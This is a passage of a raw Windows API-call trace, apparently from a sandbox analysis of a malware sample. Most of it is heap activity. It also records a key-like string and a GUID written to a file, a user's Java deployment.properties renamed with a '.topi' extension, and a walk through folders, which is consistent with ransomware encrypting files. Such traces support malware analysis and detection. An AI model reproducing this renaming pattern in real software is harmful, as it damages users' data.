(HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0098.322] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0098.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0098.322] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0098.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191cf0 [0098.322] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5150 | out: hHeap=0x680000) returned 1 [0098.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0098.322] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0098.323] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0098.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0098.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0098.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0098.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0098.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0098.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191cf0 | out: hHeap=0x680000) returned 1 [0098.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0098.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0098.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0098.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0098.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5180 | out: hHeap=0x680000) returned 1 [0098.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0098.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0098.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0098.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5168 | out: hHeap=0x680000) returned 1 [0098.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5138 | out: hHeap=0x680000) returned 1 [0098.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0098.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0098.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0098.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5120 | out: hHeap=0x680000) returned 1 [0098.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fbe78 | out: hHeap=0x680000) returned 1 [0098.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0098.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0098.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0098.324] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0098.324] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0098.324] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0098.324] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0098.324] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0098.324] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0098.324] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0098.324] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0098.324] WriteFile (in: hFile=0x6a8, lpBuffer=0x31beb38*, nNumberOfBytesToWrite=0x2ca, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x31beb38*, lpNumberOfBytesWritten=0x9ccfb14*=0x2ca, lpOverlapped=0x0) returned 1 [0098.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31beb38 | out: hHeap=0x680000) returned 1 [0098.327] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x2cf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.327] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0098.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0098.327] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0098.328] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0098.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0098.328] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0098.328] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0098.328] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0098.328] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0098.328] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0098.328] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.328] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0098.328] CloseHandle (hObject=0x6a8) returned 1 [0098.329] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6040 [0098.329] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8c0) returned 0x31cf750 [0098.329] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6040 | out: hHeap=0x680000) returned 1 [0098.329] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties.topi")) returned 1 [0098.330] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0098.330] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0098.330] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.331] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x766b58 | out: hHeap=0x680000) returned 1 [0098.332] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1e5aaf0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1e5aaf0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1e5aaf0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="security", cAlternateFileName="")) returned 1 [0098.332] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317f0f8 [0098.332] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ec60 [0098.332] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfc) returned 0x99dea38 [0098.332] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317f050 [0098.332] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8210 [0098.332] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6040 [0098.332] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6108 [0098.332] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e64f0 [0098.332] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e65b8 [0098.332] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ee58 | out: hHeap=0x680000) returned 1 [0098.332] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3134738 | out: hHeap=0x680000) returned 1 [0098.332] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6360 | out: hHeap=0x680000) returned 1 [0098.332] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0098.332] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e61d0 | out: hHeap=0x680000) returned 1 [0098.332] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6298 | out: hHeap=0x680000) returned 1 [0098.332] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3152ab8 | out: hHeap=0x680000) returned 1 [0098.332] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ee58 [0098.332] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ec60 | out: hHeap=0x680000) returned 1 [0098.332] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317f0f8 | out: hHeap=0x680000) returned 1 [0098.332] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tmp", cAlternateFileName="")) returned 1 [0098.332] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.332] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4550 [0098.332] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0098.333] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4550 | out: hHeap=0x680000) returned 1 [0098.333] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.333] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tmp", cAlternateFileName="")) returned 0 [0098.333] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0098.333] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0098.333] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4718 | out: hHeap=0x680000) returned 1 [0098.333] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0098.333] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4718 [0098.333] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0098.333] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.333] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.333] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.333] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.333] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.333] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.333] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.333] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.333] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.333] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.333] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.333] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.333] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.334] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.334] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.334] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.334] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0098.334] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.334] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0098.334] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.334] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0098.334] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.334] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.334] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0098.334] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.334] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0098.334] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0098.335] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.335] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.335] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0098.335] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0098.335] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.335] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.335] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.335] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.335] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.335] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.335] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.335] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.335] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.335] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.335] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0098.335] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.335] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.335] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.335] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0098.335] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.335] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.335] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.335] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.335] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.335] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.335] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.335] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.335] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.335] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.335] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.336] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.336] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.336] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.336] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.336] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.336] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.336] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.336] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.336] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.336] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.336] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.336] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.336] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.336] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.336] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.336] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.336] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.336] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.336] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.336] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.336] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.336] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0098.336] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.336] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0098.336] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.336] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.336] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.336] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.336] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.337] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.337] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.337] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0098.337] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.337] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0098.337] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.337] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.337] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0098.337] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0098.337] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.337] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.337] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0098.337] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0098.337] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.337] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.337] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.337] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.337] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.337] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.337] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.337] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.337] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.337] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.337] RtlAllocateHeap 